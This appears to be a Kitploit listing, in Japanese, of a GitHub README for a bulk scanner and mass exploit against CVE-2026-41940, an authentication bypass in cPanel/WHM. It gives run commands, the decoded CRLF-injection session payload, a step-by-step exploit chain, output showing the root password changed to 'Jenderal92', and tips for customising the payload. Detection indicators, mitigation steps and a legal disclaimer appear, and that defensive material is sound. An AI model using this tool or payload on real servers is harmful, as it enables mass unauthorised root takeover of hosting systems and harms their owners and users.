Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41940 — cPanel/WHM 上の CVE-2026-41940 を標的としたバルクスキャナー兼一括エクスプロイトツール。自動化されたターゲット検証と高速マルチスレッド実行のために設計されています。 | Kitploit
ツール/GitHubGitHub/jenderal92/cve-2026-41940
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストコマンド&コントロール認証レッドチーミングペイロード開発
GitHubjenderal92/cve-2026-41940

CVE-2026-41940

cPanel/WHM 上の CVE-2026-41940 を標的としたバルクスキャナー兼一括エクスプロイトツール。自動化されたターゲット検証と高速マルチスレッド実行のために設計されています。

442ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-41940 - WHM/cPanel 認証バイパス一括エクスプロイト

43153

📋 説明

CVE-2026-41940 は、WHM/cPanel における重大な認証バイパス脆弱性であり、攻撃者が有効な認証情報なしで認証をバイパスし、サーバーの root アクセスを取得することを可能にします。この脆弱性は、セッション処理メカニズムにおける CRLF インジェクションを悪用して、悪意のあるセッションパラメータを注入します。

このツールは、複数のターゲットを同時にテストするためのマルチスレッド対応の一括エクスプロイト機能を提供し、インテリジェントな成功検出と無効なターゲットの自動フィルタリングを備えています。


🎯 主な機能

機能説明
✅ 一括エクスプロイトリストファイルから複数のターゲットをスキャンして悪用
🚀 マルチスレッド高速スキャンのためのスレッド数設定(デフォルト: 15)
🔐 自動パスワード変更悪用成功時に root パスワードを Jenderal92 に変更
🛡️ スマートな成功検出さまざまな WHM API レスポンス形式を自動検出
⚠️ ライセンスエラーフィルタリングライセンスエラー(無効/読み取り不可)のあるターゲットを除外
📝 構造化出力確認済みの成功のみを `domain:port
🛡️ SSL/TLS サポート自己署名証明書を自動処理
🔄 セッション管理セッション抽出、Cookie インジェクション、トークン処理を自動化
⏱️ タイムアウト制御接続タイムアウトの設定可能(デフォルト: 15 秒)
🔍 事前接続チェック悪用試行前にポートの利用可能性を確認
📊 リアルタイム進行状況各悪用段階の詳細な進行状況を表示

📦 必要条件

  • Python 2.7(必須 - Python 3.x とは非互換)
  • ターゲットへアクセスするためのインターネット接続
  • 必要なPython パッケージ:
root@kitploit:~
pip install requests urllib3 futures

または requirements.txt を使用:

root@kitploit:~
requests==2.27.1
urllib3==1.26.18
futures==3.4.0

📥 インストール

root@kitploit:~
# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940

# Install dependencies
pip install -r requirements.txt

# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py

🚀 使い方

1. ターゲットファイルを準備

1行に1つのターゲットを指定した targets.txt ファイルを作成します:

root@kitploit:~
https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com

注記: ポート 2087 は WHM のデフォルトポートです。指定しない場合は自動的にポート 2087 が使用されます。HTTP/HTTPS プレフィックスが欠落している場合は自動的に追加されます。

2. エクスプロイトを実行

基本使用法(デフォルト設定)

root@kitploit:~
python2 CVE-2026-41940.py targets.txt

マルチスレッド使用法

root@kitploit:~
# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5

# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20

カスタムホスト名

root@kitploit:~
# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10

カスタムタイムアウト

root@kitploit:~
# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30

📊 コマンドライン引数


📁 出力形式

結果ファイル(res.txt)

確認済みの悪用成功のみが保存されます。ライセンスエラー、パスワード変更失敗、接続問題のあるターゲットは自動的に除外されます。

形式:

root@kitploit:~
domain:port|root|Jenderal92

出力例:

root@kitploit:~
www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92

除外されるケース

以下のターゲットは res.txt に保存されません:

  • ライセンスエラー(Cannot Read License File)
  • パスワード変更の失敗
  • 接続タイムアウトまたは接続拒否
  • パッチ適用済み/WHM がないターゲット
  • 誤った認証情報またはセッション失敗

コンソール出力

root@kitploit:~
$ python2 CVE-2026-41940.py targets.txt --threads 10

 CVE-2026-41940 bypass authentication - Mass Exploit

[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED

==================================================

[*] Checking target: 127.0.0.1
    Original input: 127.0.0.1
    Normalized: https://127.0.0.1:2087
    Port 2087: OPEN
    Testing connection... OK (HTTP 200)

[0] hostname = example.com
[1] minting a preauth session...
    session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
    HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.118.0.13"}
[*] attempting to change the root password
    passwd -> HTTP 200
    {
      "data": {
        "app": ["system"]
      },
      "metadata": {
        "output": {
          "raw": "Password for \"root\" has been changed."
        },
        "reason": "Password changed for user \"root\".",
        "version": 1,
        "command": "passwd",
        "result": 1
      }
    }
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!

[✓] SUCCESS & SAVED: 127.0.0.1:2087
    Saved to res.txt: 127.0.0.1:2087|root|Jenderal92

==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4

[+] Results saved to res.txt

Successfully exploited targets (password changed to Jenderal92):
  ✓ 127.0.0.1:2087

🔬 エクスプロイトの仕組み

エクスプロイトは、インテリジェントな検証を備えた4つの主要ステージで構成されています:

ステージ 1: 事前認証セッション

root@kitploit:~
[1] minting a preauth session...
  • 無効な認証情報を含む POST リクエストを /login/?login_only=1 に送信
  • サーバーレスポンスから whostmgrsession Cookie を取得
  • 末尾の ,<obhex> 部分を削除してセッションベースを抽出
  • これにより、操作可能な有効なセッション形式が得られます

ステージ 2: CRLF インジェクション攻撃

root@kitploit:~
[2] sending the CRLF injection...
  • 悪意のあるペイロードを含む Authorization: Basic ヘッダー付きの GET リクエストを送信
  • Base64 ペイロードは次のようにデコードされます:
    root@kitploit:~
    root:x
    successful_internal_auth_with_timestamp=9999999999
    user=root
    tfa_verified=1
    hasroot=1
    
  • CRLF(\r\n)文字が偽のセッションパラメータを注入
  • これにより、サーバーは認証が成功したと誤認します
  • サーバーは cp_security_token を含む Location ヘッダーとともに HTTP 307 で応答

ステージ 3: セッション伝播

root@kitploit:~
[3] firing do_token_denied to propagate...
  • 操作された Cookie を使用して /scripts2/listaccts エンドポイントにアクセス
  • WHM の do_token_denied メカニズムをトリガー
  • これにより、注入されたセッションパラメータがサーバーのセッションキャッシュに伝播
  • "Token denied" を含む HTTP 401 レスポンスが伝播の成功を確認

ステージ 4: 検証とパスワード変更

root@kitploit:~
[4] verifying we're WHM root...
  • root レベルのアクセスを検証するために /json-api/version にアクセス
  • /json-api/passwd API を呼び出して root パスワードを Jenderal92 に変更
  • 複数の WHM API レスポンス形式にわたって成功をインテリジェントに検出:
    • {"metadata": {"result": 1}}(cPanel v11.118+)
    • {"status": 1}(旧バージョン)
    • {"result": [{"status": 1}]}(レガシー形式)
    • テキストベースの成功メッセージ

自動フィルタリング

このツールは以下を自動的に除外します:

  • ライセンスエラー: {"status": 0, "statusmsg": "Cannot Read License File"}
  • パスワード変更の失敗: API が成功コードを返したがパスワードが変更されていない場合
  • 接続問題: タイムアウト、接続拒否、到達不能なホスト

🛡️ 検出と緩和策

侵害指標(IOC)

監視するログ

root@kitploit:~
# WHM access log
/usr/local/cpanel/logs/access_log

# cPanel error log  
/usr/local/cpanel/logs/error_log

# Authentication log
/var/log/secure

# System messages
/var/log/messages

緩和手順

  1. WHM/cPanel を直ちに最新のパッチ適用版に更新

    root@kitploit:~
    /usr/local/cpanel/scripts/upcp
    
  2. すべてのアカウント、特に root で二要素認証(2FA)を有効化

    root@kitploit:~
    WHM → Security Center → Two-Factor Authentication
    
  3. IP ホワイトリストでWHM アクセスを制限

    root@kitploit:~
    WHM → Security Center → Host Access Control
    
  4. 不審なパターンがないかアクセスログを定期的に監視

    root@kitploit:~
    tail -f /usr/local/cpanel/logs/access_log | grep -E "(listaccts|passwd|login_only)"
    
  5. 侵害が疑われる場合はすべてのパスワードを変更

  6. ファイアウォールルールを使用してポート 2087 へのアクセスを制限

    root@kitploit:~
    # Allow only trusted IPs
    iptables -A INPUT -p tcp --dport 2087 -s YOUR_TRUSTED_IP -j ACCEPT
    iptables -A INPUT -p tcp --dport 2087 -j DROP
    
    # Or use CSF/LFD firewall
    csf -a YOUR_TRUSTED_IP
    
  7. CRLF インジェクションの試みを検出するWAF ルールを実装

  8. WHM/cPanel インストールの定期的なセキュリティ監査


📝 さまざまなシナリオでの使用例

シナリオ 1: 単一ターゲットのテスト

root@kitploit:~
echo "https://myserver.com:2087" > my_server.txt
python2 CVE-2026-41940.py my_server.txt --threads 1

シナリオ 2: 一括サーバー監査

root@kitploit:~
python2 CVE-2026-41940.py all_servers.txt --threads 20 --timeout 20

シナリオ 3: 低速ネットワーク/長距離

root@kitploit:~
python2 CVE-2026-41940.py servers.txt --threads 5 --timeout 45

シナリオ 4: プロキシ/ロードバランサー背後でのカスタムホスト名

root@kitploit:~
python2 CVE-2026-41940.py servers.txt --hostname internal.cpanel.server --threads 10

シナリオ 5: 混在ポートのターゲット

root@kitploit:~
# targets.txt can contain various formats:
https://server1.com:2087
http://server2.com:2087
server3.com:2087
127.0.0.1:2087
10.0.0.50

# All will be normalized automatically
python2 CVE-2026-41940.py targets.txt --threads 15

⚙️ トラブルシューティング

エラー: "module 'urllib' has no attribute 'urlsplit'"

問題: Python 2.7 の代わりに Python 3 を使用している
解決策: このツールは Python 2.7 専用です。

root@kitploit:~
# Check Python version
python2 --version  # Must show Python 2.7.x

# Run with python2 explicitly
python2 CVE-2026-41940.py targets.txt

エラー: "Connection refused - target unreachable"

問題: ターゲットがオフライン、またはファイアウォールがブロックしている
解決策:

root@kitploit:~
# Test manually
telnet target.com 2087
nmap -p 2087 target.com
curl -k https://target.com:2087

エラー: "/login didn't issue a whostmgrsession cookie"

問題: ターゲットがパッチ適用済み、または WHM を実行していない可能性がある
解決策:

  • ターゲットが WHM/cPanel を実行しているか確認
  • ブラウザで https://target:2087 にアクセスできるか確認
  • ターゲットに CVE-2026-41940 のパッチがすでに適用されている可能性がある

スキャン速度が遅い場合

解決策: スレッド数とタイムアウトを調整

root@kitploit:~
# For many targets with good connectivity
python2 CVE-2026-41940.py targets.txt --threads 30 --timeout 10

# For unreliable connections
python2 CVE-2026-41940.py targets.txt --threads 5 --timeout 45

出力にライセンスエラーが表示される場合

注記: Cannot Read License File と表示されるターゲットは res.txt から自動的に除外されます。ライセンス未取得の WHM インストールではパスワード変更が機能しないため、これは期待どおりの動作です。


🔧 高度な設定

カスタムペイロードの変更

カスタムセッションパラメータ用に PAYLOAD_B64 を変更できます:

root@kitploit:~
import base64

# Custom payload
payload = """root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1"""

encoded = base64.b64encode(payload.encode())
print(encoded)

カスタムパスワード

do_passwd() 関数(約280行目)のパスワードを変更:

root@kitploit:~
{"user": "root", "password": "YourCustomPassword123"}

成功検出の調整

do_passwd() 関数を変更して、カスタム WHM レスポンス形式を検出できます:

root@kitploit:~
# Add custom pattern in do_passwd()
if 'your_custom_success_string' in (r.text or '').lower():
    return "success"

🤝 コントリビューション

コントリビューションを歓迎します!以下の手順に従ってください:

  1. リポジトリをフォーク
  2. フィーチャーブランチを作成(git checkout -b feature/AmazingFeature)
  3. 変更をコミット(git commit -m 'Add some AmazingFeature')
  4. ブランチにプッシュ(git push origin feature/AmazingFeature)
  5. プルリクエストを開く

開発ガイドライン

  • Python 2.7 との互換性を維持
  • さまざまな WHM/cPanel バージョンでテスト
  • 適切なエラーハンドリングを追加
  • 新機能のドキュメントを更新

⭐ スター履歴

このツールがセキュリティ研究に役立つ場合は、GitHub で ⭐ を付けてください!

Star History Chart


❗ よくある質問

Q: このツールは検出されますか?
A: はい、このツールは WHM/cPanel のアクセスログに痕跡を残します。適切な許可を得て、正規のセキュリティテストにのみ使用してください。

Q: 悪用にはどのくらい時間がかかりますか?
A: ネットワーク遅延とサーバーの応答時間にもよりますが、ターゲットあたり約 5〜15 秒です。

Q: 事前の root アクセスは必要ですか?
A: いいえ、このエクスプロイトは認証なしで完全に外部から動作します。

Q: このツールは Windows で動作しますか?
A: はい、Python 2.7 が適切にインストールおよび設定されていれば動作します。

Q: ターゲットが別のポートを使用している場合はどうすればよいですか?
A: ターゲット URL にポートを指定してください: cPanel の場合は https://target.com:2083、または任意のカスタムポート。

Q: エクスプロイトが成功したのに、一部のターゲットが res.txt に保存されないのはなぜですか?
A: このツールは、パスワードが正常に変更されたターゲットのみを保存します。認証バイパスが成功した場合でも、ライセンスエラー、パスワード変更の失敗、その他の問題があるターゲットは除外されます。

Q: 影響を受ける WHM/cPanel のバージョンは?
A: CVE-2026-41940 のパッチが適用される前のバージョンです。パッチ適用済みのバージョンについては cPanel のチェンジログを確認してください。


📌 重要な注意事項

  • ✅ このツールは悪用成功時に root パスワードを Jenderal92 に変更します
  • 📡 WHM のデフォルトポートは 2087 です(指定がない場合は自動的に使用)
  • 🔒 自己署名証明書をサポートするため、SSL 証明書の検証は無効化されています
  • 💾 確認済みの成功(パスワード変更済み)のみが res.txt に保存されます
  • ⚠️ ライセンスエラーとパスワード変更の失敗は自動的に除外されます
  • 🔄 実行のたびに新しい res.txt ファイルが作成されます(以前の結果は削除されます)
  • 🌐 ターゲットに HTTP/HTTPS プレフィックスがない場合は自動的に追加されます
  • 🧵 デフォルトのスレッド数は 15 で、システムの性能に応じて調整可能です

教育的なセキュリティ研究目的で作成されました
責任を持って使用し、合法かつ倫理的であり続けてください


⚠️ 免責事項

⚠️ 重大な警告!

このツールは専ら以下の目的で作成されました:

  • ✅ 教育目的およびセキュリティ研究
  • ✅ 許可を得たペネトレーションテスト
  • ✅ 自分が所有するシステムに対するセキュリティ評価
  • ✅ 書面による許可を得た脆弱性検証

固く禁止されている用途:

  • ❌ 明示的な許可なしにシステムへアクセスすること
  • ❌ いかなる形式の違法行為
  • ❌ 悪意のある行為またはシステムへの危害
  • ❌ いかなるコンピュータシステムへの不正アクセス
  • ❌ 地域、州、連邦の法律への違反

作者は、このツールの使用に起因する誤用、損害、または結果について一切の責任を負いません。このツールを使用することにより、所有するシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用することに同意したものとみなされます。

続行する場合、以下を承認したものとみなされます:

  1. ターゲットシステムをテストする許可を持っていること
  2. 不正アクセスの法的影響を理解していること
  3. 適用されるすべての法律および規制を遵守すること
  4. 作者はあなたの行動に対して責任を負わないこと

その他の免責事項は Jenderal92 のカバーに記載されています。こちら !!! で確認できます。

ツールをダウンロード
引数説明デフォルト必須
list_fileターゲットリストを含むファイル(1行に1つ)-✅ はい
--threads同時実行スレッド数15❌ いいえ
--hostnameすべてのターゲットの Host ヘッダーを上書き自動検出❌ いいえ
--timeout接続タイムアウト(秒)15❌ いいえ
指標説明
異常な whostmgrsession Cookie適切な認証なしの異常な Cookie パターン
ヘッダー内の CRLF 文字HTTP ヘッダー内の \r\n シーケンスの検出
/scripts2/listaccts へのアクセスこのパスへの不正アクセス
パスワード Jenderal92この特定のパスワードを使用したログイン成功
cpsess トークンの漏えいLocation ヘッダーに表示されるセキュリティトークン
ログイン失敗後の成功誤ったパスワードで /login/?login_only=1 に POST した後、特権アクセス